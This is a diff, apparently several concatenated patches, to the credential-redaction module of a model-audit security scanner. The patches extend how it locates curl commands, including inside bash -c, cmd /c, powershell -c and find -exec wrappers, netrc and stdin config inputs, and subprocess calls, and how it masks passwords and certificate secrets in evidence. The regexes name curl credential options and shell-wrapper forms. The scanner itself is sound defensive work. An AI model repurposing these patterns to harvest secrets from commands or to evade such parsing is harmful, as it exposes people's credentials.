+def _curl_executable_is_command(text: str, executable_start: int) -> bool:
+    segment_start, quote, quote_start = _shell_segment_context(text, executable_start)
+    if quote is not None:
+        before_quote = text[segment_start:quote_start].rstrip()
+        if quote == "`":
+            return True
+        if not before_quote or before_quote.endswith(("(", "[", "{", ",", "=", ":")):
+            return True
+        return (
+            re.search(
+                r"(?is)(?:\b(?:bash|sh)\s+-c|\bcmd(?:\.exe)?\s+/c|\bpowershell(?:\.exe)?\s+-c)$",
+                before_quote,
+            )
+            is not None
+        )
+
+    prefix = text[segment_start:executable_start].rstrip()
+    if not prefix:
+        return True
+    if re.fullmatch(
+        r"(?is)(?:\b(?:bash|sh)\s+-c|\bcmd(?:\.exe)?\s+/c|\bpowershell(?:\.exe)?\s+-c)",
+        prefix,
+    ):
+        return True
+    if prefix.endswith(("(", "[", "{", ",", "=", ":")):
+        return True
+    return _shell_wrapper_prefix_allows_command(prefix)
+
+
+def _curl_command_ranges(text: str) -> list[tuple[int, int]]:
+    ranges: list[tuple[int, int]] = []
+    covered_until = -1
+    for match in CURL_EXECUTABLE_RE.finditer(text):
+        if match.start() < covered_until:
+            continue
+        executable_start = _curl_executable_token_start(text, match.start())
+        if executable_start is None or not _curl_executable_is_command(text, executable_start):
+            continue
+        _, enclosing_quote, _ = _shell_segment_context(text, executable_start)
+        segment_end = len(text)
+        quote = enclosing_quote if enclosing_quote in {"'", '"'} else None
+        bracket_depth = 0
+        index = match.end()
+        while index < len(text):
+            char = text[index]
+            if quote is not None:
+                if char == quote and _count_preceding_backslashes(text, index) % 2 == 0:
+                    quote = None
+                index += 1
+                continue
+            if char in {"'", '"'}:
+                quote = char
+            elif char == "`" and enclosing_quote == "`" and bracket_depth == 0:
+                segment_end = index
+                break
+            elif char == "(" and _count_preceding_backslashes(text, index) % 2 == 0:
+                bracket_depth += 1
+            elif char == ")" and _count_preceding_backslashes(text, index) % 2 == 0:
+                if bracket_depth == 0:
+                    segment_end = index
+                    break
+                bracket_depth -= 1
+            elif (
+                bracket_depth == 0
+                and char in {";", "&", "|", "\n"}
+                and _count_preceding_backslashes(text, index) % 2 == 0
+            ):
+                segment_end = index
+                break
+            index += 1
+        ranges.append((executable_start, min(segment_end, executable_start + 2048)))
+        covered_until = segment_end
+    return ranges
+
+
+def _redact_curl_credentials(text: str) -> str:
+    for start, end in reversed(_curl_command_ranges(text)):
+        fragment = text[start:end]
+        fragment = COMMAND_CERT_PASSWORD_QUOTED_RE.sub(_redact_quoted_certificate_password, fragment)
+        fragment = COMMAND_CERT_PASSWORD_RE.sub(_redact_certificate_password, fragment)
+        fragment = COMMAND_QUOTED_USER_PASSWORD_RE.sub(_redact_quoted_command_user_password, fragment)
+        fragment = COMMAND_SUBSTITUTION_USER_PASSWORD_RE.sub(_redact_substitution_command_user_password, fragment)
+        fragment = COMMAND_USER_PASSWORD_RE.sub(_redact_command_user_password, fragment)
+        text = f"{text[:start]}{fragment}{text[end:]}"
+    return text
+
+
+def _redact_curl_config_fragment(fragment: str) -> str:
+    fragment = COMMAND_CONFIG_QUOTED_USER_PASSWORD_RE.sub(_redact_quoted_command_user_password, fragment)
+    fragment = COMMAND_CONFIG_USER_PASSWORD_RE.sub(_redact_command_user_password, fragment)
+    fragment = COMMAND_CONFIG_CERT_PASSWORD_QUOTED_RE.sub(_redact_quoted_certificate_password, fragment)
+    fragment = COMMAND_CONFIG_CERT_PASSWORD_RE.sub(_redact_certificate_password, fragment)
+    return COMMAND_CONFIG_SECRET_OPTION_RE.sub(_redact_command_positional_secret, fragment)
+
+
+def _find_preceding_shell_pipe(text: str, start: int, end: int) -> tuple[int, int]:
+    quote: str | None = None
+    pipeline_start = start
+    last_pipe = -1
+    last_pipe_source_start = start
+    index = start
+    while index < end:
+        char = text[index]
+        if quote is not None:
+            if char == quote and _count_preceding_backslashes(text, index) % 2 == 0:
+                quote = None
+            index += 1
+            continue
+        if char in {"'", '"'}:
+            quote = char
+            index += 1
+            continue
+        if char == "\\":
+            index += 2
+            continue
+        if text.startswith(("&&", "||"), index):
+            pipeline_start = index + 2
+            last_pipe = -1
+            index += 2
+            continue
+        if char == ";":
+            pipeline_start = index + 1
+            last_pipe = -1
+        elif char == "|":
+            last_pipe = index
+            last_pipe_source_start = pipeline_start
+        index += 1
+    return last_pipe, last_pipe_source_start
+
+
 def _redact_inline_curl_config_passwords(text: str) -> str:
     """Redact credentials only inside inline curl config and netrc sources."""
     ranges: list[tuple[int, int, bool]] = []
     for match in CURL_INLINE_CONFIG_SOURCE_RE.finditer(text):
+        executable_start = _curl_executable_token_start(text, match.start())
+        if executable_start is None or not _curl_executable_is_command(text, executable_start):
+            continue
         is_netrc = match.group("netrc") is not None
         if match.group("source") == "<(":
             ranges.append((match.end(), _find_shell_group_end(text, match.end()), is_netrc))
             continue
 
-        pipe = text.rfind("|", 0, match.start())
+        line_start = text.rfind("\n", 0, match.start()) + 1
+        pipe, input_start = _find_preceding_shell_pipe(text, line_start, match.start())
         if pipe >= 0:
-            input_start = max(text.rfind(";", 0, pipe), text.rfind("\n", 0, pipe)) + 1
             ranges.append((input_start, pipe, is_netrc))
-        here_string = re.match(r"\s*<<<\s*", text[match.end() :])
+            piped_heredoc_range = _find_shell_heredoc_body_range(text, input_start)
+            if piped_heredoc_range is not None:
+                ranges.append((*piped_heredoc_range, is_netrc))
+
+        line_end = text.find("\n", match.end())
+        if line_end < 0:
+            line_end = len(text)
+        here_string = _search_unquoted_shell_pattern(SHELL_HERE_STRING_VALUE_RE, text, match.end(), line_end)
         if here_string is not None:
-            ranges.append((match.end() + here_string.end(), len(text), is_netrc))
+            ranges.append((here_string.start("value"), here_string.end("value"), is_netrc))
         heredoc_range = _find_shell_heredoc_body_range(text, match.end())
         if heredoc_range is not None:
             ranges.append((*heredoc_range, is_netrc))
@@ -2635,9 +2958,7 @@ def _redact_inline_curl_config_passwords(text: str) -> str:
         if is_netrc:
             fragment = COMMAND_NETRC_PASSWORD_RE.sub(_redact_netrc_password, fragment)
         else:
-            fragment = COMMAND_CONFIG_QUOTED_USER_PASSWORD_RE.sub(_redact_quoted_command_user_password, fragment)
-            fragment = COMMAND_CONFIG_USER_PASSWORD_RE.sub(_redact_command_user_password, fragment)
-            fragment = COMMAND_CONFIG_SECRET_OPTION_RE.sub(_redact_command_positional_secret, fragment)
+            fragment = _redact_curl_config_fragment(fragment)
         text = f"{text[:start]}{fragment}{text[end:]}"
     return text
 
@@ -2800,14 +3121,154 @@ def _is_stdin_auth_subprocess_command(raw_argument: str) -> bool:
     return False
 
 
+def _curl_config_arguments_use_stdin(arguments: list[str]) -> bool:
+    for index, argument in enumerate(arguments):
+        if argument.casefold() == "--config=-":
+            return True
+        if argument.casefold() == "--config" and index + 1 < len(arguments) and arguments[index + 1] == "-":
+            return True
+        if re.fullmatch(rf"{CURL_CONFIG_SHORT_OPTION_PATTERN}-", argument) is not None:
+            return True
+        if (
+            re.fullmatch(CURL_CONFIG_SHORT_OPTION_PATTERN, argument) is not None
+            and index + 1 < len(arguments)
+            and arguments[index + 1] == "-"
+        ):
+            return True
+    return False
+
+
+def _is_curl_config_subprocess_command(raw_argument: str) -> bool:
+    command = _safe_eval_subprocess_command(raw_argument)
+    if isinstance(command, str):
+        for command_start, command_end in _curl_command_ranges(command):
+            fragment = command[command_start:command_end]
+            match = CURL_EXECUTABLE_RE.search(fragment)
+            if match is None:
+                continue
+            argument_start = match.end()
+            if argument_start < len(fragment) and fragment[argument_start] in {"'", '"'}:
+                argument_start += 1
+            try:
+                arguments = shlex.split(fragment[argument_start:])
+            except ValueError:
+                continue
+            if _curl_config_arguments_use_stdin(arguments):
+                return True
+        return False
+    if not isinstance(command, (list, tuple)) or not command:
+        return False
+    executable = command[0].replace("\\", "/").rsplit("/", 1)[-1].casefold().removesuffix(".exe")
+    return executable == "curl" and _curl_config_arguments_use_stdin(list(command[1:]))
+
+
+def _safe_eval_bytes_expr(node: ast.AST) -> bytes | None:
+    if isinstance(node, ast.Expression):
+        return _safe_eval_bytes_expr(node.body)
+    if isinstance(node, ast.Constant) and isinstance(node.value, bytes):
+        return node.value if len(node.value) <= MAX_EVALUATED_KEY_CHARS else None
+    if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
+        left = _safe_eval_bytes_expr(node.left)
+        right = _safe_eval_bytes_expr(node.right)
+        if left is not None and right is not None and len(left) + len(right) <= MAX_EVALUATED_KEY_CHARS:
+            return left + right
+    return None
+
+
+def _safe_eval_curl_config_input(node: ast.AST) -> str | bytes | None:
+    if isinstance(node, ast.Expression):
+        return _safe_eval_curl_config_input(node.body)
+    if isinstance(node, ast.Constant) and isinstance(node.value, (str, bytes)):
+        return node.value if len(node.value) <= EVIDENCE_URL_LOOKAHEAD_CHARS else None
+    if isinstance(node, ast.JoinedStr):
+        parts: list[str] = []
+        for value in node.values:
+            if not isinstance(value, ast.Constant) or not isinstance(value.value, str):
+                return None
+            parts.append(value.value)
+        joined = "".join(parts)
+        return joined if len(joined) <= EVIDENCE_URL_LOOKAHEAD_CHARS else None
+    if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
+        left = _safe_eval_curl_config_input(node.left)
+        right = _safe_eval_curl_config_input(node.right)
+        if isinstance(left, str) and isinstance(right, str):
+            combined = left + right
+            return combined if len(combined) <= EVIDENCE_URL_LOOKAHEAD_CHARS else None
+        if isinstance(left, bytes) and isinstance(right, bytes):
+            combined_bytes = left + right
+            return combined_bytes if len(combined_bytes) <= EVIDENCE_URL_LOOKAHEAD_CHARS else None
+    return None
+
+
+def _redact_static_curl_config_input(raw_value: str) -> str | None:
+    raw_redacted = _redact_curl_config_fragment(raw_value)
+    if raw_redacted != raw_value:
+        return raw_redacted
+    try:
+        node = ast.parse(raw_value.strip(), mode="eval")
+    except SyntaxError:
+        return None
+    value = _safe_eval_curl_config_input(node)
+    if isinstance(value, str):
+        redacted = _redact_curl_config_fragment(value)
+        return repr(redacted) if redacted != value else None
+    if not isinstance(value, bytes):
+        return None
+    decoded = value.decode("utf-8", errors="replace")
+    redacted = _redact_curl_config_fragment(decoded)
+    if redacted == decoded:
+        return None
+    redacted_bytes = redacted.encode()
+    return repr(redacted_bytes)
+
+
 def _is_static_string_input(raw_value: str) -> bool:
     try:
         node = ast.parse(raw_value.strip(), mode="eval")
     except SyntaxError:
         return False
-    if isinstance(node.body, ast.Constant) and isinstance(node.body.value, (str, bytes)):
-        return True
-    return isinstance(_safe_eval_string_expr(node), str)
+    return isinstance(_safe_eval_string_expr(node), str) or _safe_eval_bytes_expr(node) is not None
+
+
+def _redact_subprocess_curl_config_inputs(text: str) -> str:
+    replacements: list[tuple[int, int, str]] = []
+    for call_match in SUBPROCESS_CALL_PREFIX_RE.finditer(text):
+        argument_start = call_match.end()
+        arguments: list[tuple[int, int, re.Match[str] | None]] = []
+        while argument_start < len(text):
+            argument_end = _find_function_argument_end(text, argument_start)
+            raw_argument = text[argument_start:argument_end]
+            if raw_argument.strip():
+                arguments.append((argument_start, argument_end, FUNCTION_KEYWORD_ARGUMENT_RE.match(raw_argument)))
+            if argument_end >= len(text) or text[argument_end] != ",":
+                break
+            argument_start = argument_end + 1
+
+        command_argument = next((text[start:end] for start, end, keyword in arguments if keyword is None), None)
+        if command_argument is None:
+            command_argument = next(
+                (
+                    text[start + keyword.end() : end]
+                    for start, end, keyword in arguments
+                    if keyword is not None and keyword.group("name").casefold() == "args"
+                ),
+                None,
+            )
+        if command_argument is None or not _is_curl_config_subprocess_command(command_argument):
+            continue
+
+        for start, end, keyword in arguments:
+            if keyword is None or keyword.group("name").casefold() != "input":
+                continue
+            value_start = start + keyword.end()
+            raw_value = text[value_start:end]
+            redacted_value = _redact_static_curl_config_input(raw_value)
+            if redacted_value is not None and redacted_value != raw_value:
+                replacements.append((value_start, end, redacted_value))
+
+    for start, end, replacement in reversed(replacements):
+        text = f"{text[:start]}{replacement}{text[end:]}"
+    return text
 
 
 def _redact_subprocess_stdin_auth_inputs(text: str) -> str:
@@ -3065,6 +3526,9 @@ def _find_command_context_end(text: str, start: int) -> int:
             triple = text.startswith(char * 3, index)
             index += 3 if triple else 1
             continue
+        if char in {",", ";", "|", ")", "]", "}"} and _count_preceding_backslashes(text, index) % 2 == 1:
+            index += 1
+            continue
         if bracket_depth == 0 and index > start:
             if char in {",", ";", "|", "\n", ")", "]", "}"}:
                 return index
@@ -3085,13 +3549,21 @@ def _find_command_context_end(text: str, start: int) -> int:
 def _command_context_spans(text: str) -> list[tuple[int, int]]:
     spans: list[tuple[int, int]] = []
     for match in COMMAND_EVIDENCE_RE.finditer(text):
-        if spans and match.start() < spans[-1][1]:
+        span_start = match.start()
+        if re.fullmatch(CURL_EXECUTABLE_NAME_PATTERN, match.group(0), re.IGNORECASE):
+            executable_start = _curl_executable_token_start(text, match.start())
+            segment_start, enclosing_quote, quote_start = _shell_segment_context(text, match.start())
+            if executable_start is None or not _curl_executable_is_command(text, executable_start):
+                span_start = segment_start
+            elif enclosing_quote is not None and quote_start >= segment_start:
+                span_start = quote_start
+        if spans and span_start < spans[-1][1]:
             continue
-        end = _find_command_context_end(text, match.start())
-        if spans and match.start() <= spans[-1][1]:
+        end = _find_command_context_end(text, span_start)
+        if spans and span_start <= spans[-1][1]:
             spans[-1] = (spans[-1][0], max(spans[-1][1], end))
         else:
-            spans.append((match.start(), end))
+            spans.append((span_start, end))
     return spans
 
 
@@ -3222,6 +3694,7 @@ def _redact_command_string_literals(text: str) -> str:
 def _redact_command_evidence_text(text: str) -> str:
     redacted = _redact_inline_curl_config_passwords(text)
     redacted = _redact_inline_password_sources(redacted)
+    redacted = _redact_subprocess_curl_config_inputs(redacted)
     redacted = _redact_subprocess_stdin_auth_inputs(redacted)
     redacted = _redact_inline_command_secret_sources(redacted)
     redacted = NPMRC_SCOPED_AUTH_ASSIGNMENT_RE.sub(_redact_command_positional_secret, redacted)
@@ -3248,11 +3721,7 @@ def _redact_command_evidence_text(text: str) -> str:
     redacted = COMMAND_SECRET_OPTION_SERIALIZED_QUOTED_RE.sub(_redact_serialized_command_option, redacted)
     redacted = COMMAND_SECRET_OPTION_RE.sub(rf"\1{REDACTED_EVIDENCE_VALUE}", redacted)
     redacted = COMMAND_BODY_OPTION_RE.sub(_redact_command_body_option, redacted)
-    redacted = COMMAND_CERT_PASSWORD_QUOTED_RE.sub(_redact_quoted_certificate_password, redacted)
-    redacted = COMMAND_CERT_PASSWORD_RE.sub(_redact_certificate_password, redacted)
-    redacted = COMMAND_QUOTED_USER_PASSWORD_RE.sub(_redact_quoted_command_user_password, redacted)
-    redacted = COMMAND_SUBSTITUTION_USER_PASSWORD_RE.sub(_redact_substitution_command_user_password, redacted)
-    redacted = COMMAND_USER_PASSWORD_RE.sub(_redact_command_user_password, redacted)
+    redacted = _redact_curl_credentials(redacted)
     pieces: list[str] = []
     cursor = 0
     for match in COMMAND_URL_CONTEXT_RE.finditer(redacted):
@@ -3309,6 +3778,7 @@ def redact_evidence_string(text: str, max_chars: int = 180) -> str:
     redacted = STRUCTURED_QUOTED_SENSITIVE_ASSIGNMENT_RE.sub(_redact_structured_quoted_assignment, redacted)
     redacted = _redact_inline_curl_config_passwords(redacted)
     redacted = _redact_inline_password_sources(redacted)
+    redacted = _redact_curl_credentials(redacted)
     redacted = _redact_command_context_tokens(redacted)
     redacted = _redact_sensitive_argv_pairs(redacted)
     redacted = _redact_sensitive_setter_arguments(redacted)

--- a/modelaudit/scanners/_catboost_evidence_redaction.py
+++ b/modelaudit/scanners/_catboost_evidence_redaction.py
@@ -262,18 +262,24 @@ CURL_ATTACHED_COOKIE_SERIALIZED_QUOTED_RE: Final[re.Pattern[str]] = re.compile(
     r"(?P<prefix>\$?)(?P<slashes>\\+)(?P<quote>[\"'])(?:(?!(?<!\\)(?P=slashes)(?P=quote)|,)[\s\S])*?"
     r"(?<!\\)(?P=slashes)(?P=quote)"
 )
-COMMAND_QUOTED_CREDENTIAL_CHAR_PATTERN: Final[str] = r"(?:\\.|(?!\\)(?!(?P=quote)).)"
+COMMAND_QUOTED_CREDENTIAL_CHAR_PATTERN: Final[str] = r"(?:\\.|\\\Z|(?!\\)(?!(?P=quote)).)"
 COMMAND_QUOTED_CREDENTIAL_NAME_CHAR_PATTERN: Final[str] = r"(?:\\.|(?!\\)(?!:)(?!(?P=quote)).)"
+COMMAND_CERT_OPTION_BOUNDARY_PATTERN: Final[str] = r"(?<![^\s\"'])"
+COMMAND_CERT_OPTION_ESCAPE_PATTERN: Final[str] = r"(?:\\)?"
+COMMAND_CERT_OPTION_PATTERN: Final[str] = (
+    rf"(?:{COMMAND_CERT_OPTION_BOUNDARY_PATTERN}{COMMAND_CERT_OPTION_ESCAPE_PATTERN}"
+    rf"--(?:proxy-)?cert(?:=|\s+)|{COMMAND_CERT_OPTION_BOUNDARY_PATTERN}{COMMAND_CERT_OPTION_ESCAPE_PATTERN}"
+    rf"-(?-i:[A-DF-Za-z0-9#:]*E)(?:=|\s*))"
+)
 COMMAND_CERT_PASSWORD_QUOTED_RE: Final[re.Pattern[str]] = re.compile(
-    r"(?is)(?P<option>((?<!\w)--(?:proxy-)?cert|(?<!\w)-E)(?:=|\s+))"
-    rf"(?P<prefix>\$?)(?P<quote>[\"'])(?P<certificate>(?:[A-Za-z]:[\\/])?"
-    rf"{COMMAND_QUOTED_CREDENTIAL_NAME_CHAR_PATTERN}*:)"
+    rf"(?is)(?P<option>{COMMAND_CERT_OPTION_PATTERN})"
+    rf"(?P<prefix>\$?)(?P<quote>[\"'])(?P<certificate>{COMMAND_QUOTED_CREDENTIAL_NAME_CHAR_PATTERN}*:)"
     rf"(?P<password>{COMMAND_QUOTED_CREDENTIAL_CHAR_PATTERN}+)(?P<closing>(?P=quote)|\Z)"
 )
-COMMAND_UNQUOTED_CERTIFICATE_NAME_CHAR_PATTERN: Final[str] = r"(?:\\.|(?!\\)(?!:)[^\s\"';&|)])"
+COMMAND_UNQUOTED_CERTIFICATE_NAME_CHAR_PATTERN: Final[str] = r"(?:\\[^:\r\n]|(?!\\)(?!:)[^\s\"';&|)])"
 COMMAND_CERT_PASSWORD_RE: Final[re.Pattern[str]] = re.compile(
-    r"(?i)(?P<option>((?<!\w)--(?:proxy-)?cert|(?<!\w)-E)(?:=|\s+))"
-    rf"(?P<certificate>(?:[A-Za-z]:[\\/])?{COMMAND_UNQUOTED_CERTIFICATE_NAME_CHAR_PATTERN}*:)"
+    rf"(?i)(?P<option>{COMMAND_CERT_OPTION_PATTERN})"
+    rf"(?P<certificate>{COMMAND_UNQUOTED_CERTIFICATE_NAME_CHAR_PATTERN}*(?:\\)?:)"
     r"(?P<password>[^\s\"';&|)]+)"
 )
 COMMAND_USER_PASSWORD_RE: Final[re.Pattern[str]] = re.compile(
@@ -2637,8 +2643,6 @@ def _redact_inline_curl_config_passwords(text: str) -> str:
 
 
 def _redact_quoted_certificate_password(match: re.Match[str]) -> str:
-    if re.fullmatch(r"[A-Za-z]:", match.group("certificate")) and match.group("password").startswith(("\\", "/")):
-        return match.group(0)
     return (
         f"{match.group('option')}{match.group('prefix')}{match.group('quote')}"
         f"{match.group('certificate')}{REDACTED_EVIDENCE_VALUE}{match.group('closing')}"
@@ -2653,8 +2657,6 @@ def _redact_serialized_command_option(match: re.Match[str]) -> str:
 
 
 def _redact_certificate_password(match: re.Match[str]) -> str:
-    if re.fullmatch(r"[A-Za-z]:", match.group("certificate")) and match.group("password").startswith(("\\", "/")):
-        return match.group(0)
     return f"{match.group('option')}{match.group('certificate')}{REDACTED_EVIDENCE_VALUE}"
 
 

--- a/modelaudit/scanners/_catboost_evidence_redaction.py
+++ b/modelaudit/scanners/_catboost_evidence_redaction.py
@@ -26,6 +26,8 @@ REDACTED_EVIDENCE_VALUE: Final[str] = "<redacted>"
 REDACTED_URL_CREDENTIALS: Final[str] = "<credentials-redacted>"
 EVIDENCE_REDACTION_LOOKAHEAD_CHARS: Final[int] = 4096
 EVIDENCE_URL_LOOKAHEAD_CHARS: Final[int] = 64 * 1024
+CURL_COMMAND_SCAN_CHARS: Final[int] = EVIDENCE_URL_LOOKAHEAD_CHARS
+MAX_CURL_EXECUTABLE_CANDIDATES: Final[int] = 64
 MAX_URL_QUERY_DECODE_PASSES: Final[int] = 8
 MAX_NESTED_URL_QUERY_DEPTH: Final[int] = 8
 MAX_EVALUATED_KEY_CHARS: Final[int] = 256
@@ -239,7 +241,8 @@ CURL_COMMAND_TRANSITION_PATTERN: Final[str] = (
     r"(?=\s+-)"
 )
 CURL_ATTACHED_COOKIE_OPTION_PREFIX_PATTERN: Final[str] = (
-    rf"\b{CURL_EXECUTABLE_NAME_PATTERN}\b(?:(?![;&|\n]|{CURL_COMMAND_TRANSITION_PATTERN}(?=\s|$)).){{0,2048}}?"
+    rf"\b{CURL_EXECUTABLE_NAME_PATTERN}\b"
+    rf"(?:(?![;&|\n]|{CURL_COMMAND_TRANSITION_PATTERN}(?=\s|$)).){{0,{CURL_COMMAND_SCAN_CHARS}}}?"
     r"(?<=[\s\"'])-[A-Za-z]*?b"
 )
 CURL_ATTACHED_COOKIE_OPTION_RE: Final[re.Pattern[str]] = re.compile(
@@ -304,6 +307,14 @@ COMMAND_SUBSTITUTION_USER_PASSWORD_RE: Final[re.Pattern[str]] = re.compile(
     rf"(?is)(?P<option>(?:{COMMAND_USER_OPTION_PATTERN})(?:=|\s+)?)"
     r"(?P<username>[^:\s\"';&|]*:)(?P<password>\$\((?:\\.|[^\\)])*\))"
 )
+COMMAND_USER_SHELL_WORD_RE: Final[re.Pattern[str]] = re.compile(
+    rf"(?is)(?P<option>(?:{COMMAND_USER_OPTION_PATTERN})(?:=|\s+)?)"
+    r"(?P<argument>(?:\\[\s\S]|[^\s;&|)])+)"
+)
+COMMAND_CERT_SHELL_WORD_RE: Final[re.Pattern[str]] = re.compile(
+    rf"(?is)(?P<option>{COMMAND_CERT_OPTION_PATTERN})"
+    r"(?P<argument>(?:\\[\s\S]|[^\s;&|)])+)"
+)
 COMMAND_CONFIG_QUOTED_USER_PASSWORD_RE: Final[re.Pattern[str]] = re.compile(
     r"(?is)(?<![?&/\w-])(?P<option>(?:proxy-)?user\s*(?:=|:|\s+)\s*)"
     rf"(?P<prefix>\$?)(?P<quote>[\"'])(?P<username>{COMMAND_QUOTED_CREDENTIAL_NAME_CHAR_PATTERN}*:)"
@@ -314,7 +325,8 @@ COMMAND_CONFIG_USER_PASSWORD_RE: Final[re.Pattern[str]] = re.compile(
     r"([^\"'\r\n]+)([\"']?)"
 )
 CURL_INLINE_CONFIG_SOURCE_RE: Final[re.Pattern[str]] = re.compile(
-    rf"(?is)\b{CURL_EXECUTABLE_NAME_PATTERN}\b(?:(?![;&|\n]).){{0,2048}}?"
+    rf"(?is)\b{CURL_EXECUTABLE_NAME_PATTERN}\b"
+    rf"(?:(?![;&|\n]|{CURL_COMMAND_TRANSITION_PATTERN}(?=\s|$)).){{0,{CURL_COMMAND_SCAN_CHARS}}}?"
     rf"(?P<option>(?<!\w)(?:(?P<config>--config)(?:=|\s+)|"
     rf"(?P<short_config>{CURL_CONFIG_SHORT_OPTION_PATTERN})\s*|"
     r"(?P<netrc>--netrc-file)(?:=|\s+)))"
@@ -402,7 +414,8 @@ SSHPASS_FILE_DESCRIPTOR_SOURCE_RE: Final[re.Pattern[str]] = re.compile(
 )
 COMMAND_INLINE_SECRET_SOURCE_RE: Final[re.Pattern[str]] = re.compile(
     rf"(?is)(?:(?<!\w){COMMAND_SECRET_LONG_OPTION_PATTERN}(?:=|\s+)|"
-    rf"\b{CURL_EXECUTABLE_NAME_PATTERN}\b(?:(?![;&|\n]|{CURL_COMMAND_TRANSITION_PATTERN}(?=\s|$)).){{0,2048}}?"
+    rf"\b{CURL_EXECUTABLE_NAME_PATTERN}\b"
+    rf"(?:(?![;&|\n]|{CURL_COMMAND_TRANSITION_PATTERN}(?=\s|$)).){{0,{CURL_COMMAND_SCAN_CHARS}}}?"
     r"(?<!\w)-[A-Za-z]*b(?![A-Za-z])(?:=|\s+))\s*<\("
 )
 SHELL_HERE_STRING_VALUE_RE: Final[re.Pattern[str]] = re.compile(
@@ -2704,6 +2717,13 @@ def _shell_wrapper_prefix_allows_command(prefix: str) -> bool:
     except ValueError:
         return False
 
+    if tokens and tokens[0].replace("\\", "/").rsplit("/", 1)[-1] == "find":
+        exec_indexes = [index for index, token in enumerate(tokens) if token in {"-exec", "-execdir"}]
+        if not exec_indexes:
+            return False
+        nested_prefix = tokens[exec_indexes[-1] + 1 :]
+        return not nested_prefix or _shell_wrapper_prefix_allows_command(shlex.join(nested_prefix))
+
     index = 0
     while index < len(tokens) and tokens[index] in {"!", "do", "elif", "if", "then", "until", "while"}:
         index += 1
@@ -2789,6 +2809,37 @@ def _shell_wrapper_prefix_allows_command(prefix: str) -> bool:
                         return False
                     index += 1
             continue
+        if wrapper == "timeout":
+            options_with_values = {"-k", "-s", "--kill-after", "--signal"}
+            while index < len(tokens) and tokens[index].startswith("-"):
+                token = tokens[index]
+                if token == "--":
+                    index += 1
+                    break
+                option = token.split("=", 1)[0]
+                index += 1
+                if option in options_with_values and "=" not in token:
+                    if index >= len(tokens):
+                        return False
+                    index += 1
+            if index >= len(tokens):
+                return False
+            index += 1
+            continue
+        if wrapper == "stdbuf":
+            options_with_values = {"-e", "-i", "-o", "--error", "--input", "--output"}
+            while index < len(tokens) and tokens[index].startswith("-"):
+                token = tokens[index]
+                if token == "--":
+                    index += 1
+                    break
+                option = token.split("=", 1)[0]
+                index += 1
+                if option in options_with_values and "=" not in token:
+                    if index >= len(tokens):
+                        return False
+                    index += 1
+            continue
         return False
     return True
 
@@ -2863,12 +2914,21 @@ def _curl_command_ranges(text: str) -> list[tuple[int, int]]:
                 segment_end = index
                 break
             index += 1
-        ranges.append((executable_start, min(segment_end, executable_start + 2048)))
+        ranges.append((executable_start, min(segment_end, executable_start + CURL_COMMAND_SCAN_CHARS)))
         covered_until = segment_end
     return ranges
 
 
+def _curl_candidate_limit_exceeded(text: str) -> bool:
+    for index, _ in enumerate(CURL_EXECUTABLE_RE.finditer(text), start=1):
+        if index > MAX_CURL_EXECUTABLE_CANDIDATES:
+            return True
+    return False
+
+
 def _redact_curl_credentials(text: str) -> str:
+    if _curl_candidate_limit_exceeded(text):
+        return REDACTED_EVIDENCE_VALUE
     for start, end in reversed(_curl_command_ranges(text)):
         fragment = text[start:end]
         fragment = COMMAND_CERT_PASSWORD_QUOTED_RE.sub(_redact_quoted_certificate_password, fragment)
@@ -2876,6 +2936,8 @@ def _redact_curl_credentials(text: str) -> str:
         fragment = COMMAND_QUOTED_USER_PASSWORD_RE.sub(_redact_quoted_command_user_password, fragment)
         fragment = COMMAND_SUBSTITUTION_USER_PASSWORD_RE.sub(_redact_substitution_command_user_password, fragment)
         fragment = COMMAND_USER_PASSWORD_RE.sub(_redact_command_user_password, fragment)
+        fragment = COMMAND_CERT_SHELL_WORD_RE.sub(_redact_shell_word_credential, fragment)
+        fragment = COMMAND_USER_SHELL_WORD_RE.sub(_redact_shell_word_credential, fragment)
         text = f"{text[:start]}{fragment}{text[end:]}"
     return text
 
@@ -2981,6 +3043,24 @@ def _redact_certificate_password(match: re.Match[str]) -> str:
     return f"{match.group('option')}{match.group('certificate')}{REDACTED_EVIDENCE_VALUE}"
 
 
+def _redact_shell_word_credential(match: re.Match[str]) -> str:
+    argument = match.group("argument")
+    preceding_backslashes = 0
+    colon_index = -1
+    for index, char in enumerate(argument):
+        if char == ":" and preceding_backslashes % 2 == 0:
+            colon_index = index
+            break
+        preceding_backslashes = preceding_backslashes + 1 if char == "\\" else 0
+    if colon_index < 0 or colon_index + 1 >= len(argument):
+        return match.group(0)
+
+    password = argument[colon_index + 1 :]
+    if REDACTED_EVIDENCE_VALUE in password:
+        return match.group(0)
+    return f"{match.group('option')}{argument[: colon_index + 1]}{_redact_positional_secret_value(password)}"
+
+
 def _find_function_argument_end(text: str, start: int) -> int:
     quote: str | None = None
     quote_slashes = 0
@@ -3074,7 +3154,31 @@ def _argv_pair_is_for_curl(text: str, pair_start: int) -> bool:
     if collection_start < 0:
         return False
     collection_prefix = text[collection_start + 1 : pair_start]
-    return PYTHON_CURL_ARGV_START_RE.match(collection_prefix) is not None
+    if PYTHON_CURL_ARGV_START_RE.match(collection_prefix) is not None:
+        return True
+    try:
+        prefix_values = _safe_eval_string_expr(ast.parse(f"[{collection_prefix}]", mode="eval"))
+    except SyntaxError:
+        return False
+    if not isinstance(prefix_values, list) or not prefix_values:
+        return False
+
+    return _curl_argv_executable_index(prefix_values) is not None
+
+
+def _curl_argv_executable_index(arguments: list[str]) -> int | None:
+    """Return the curl executable position after supported command wrappers."""
+    if not arguments:
+        return None
+
+    for index, value in enumerate(arguments):
+        executable = value.replace("\\", "/").rsplit("/", 1)[-1]
+        if re.fullmatch(CURL_EXECUTABLE_NAME_PATTERN, executable, re.IGNORECASE) is None:
+            continue
+        if index == 0 or _shell_wrapper_prefix_allows_command(shlex.join(arguments[:index])):
+            return index
+        return None
+    return None
 
 
 def _redact_curl_argv_credential_value(option: str, value: str) -> str | None:
@@ -3125,7 +3229,11 @@ def _curl_config_arguments_use_stdin(arguments: list[str]) -> bool:
     for index, argument in enumerate(arguments):
         if argument.casefold() == "--config=-":
             return True
+        if argument.casefold() == "--netrc-file=-":
+            return True
         if argument.casefold() == "--config" and index + 1 < len(arguments) and arguments[index + 1] == "-":
+            return True
+        if argument.casefold() == "--netrc-file" and index + 1 < len(arguments) and arguments[index + 1] == "-":
             return True
         if re.fullmatch(rf"{CURL_CONFIG_SHORT_OPTION_PATTERN}-", argument) is not None:
             return True
@@ -3158,8 +3266,9 @@ def _is_curl_config_subprocess_command(raw_argument: str) -> bool:
         return False
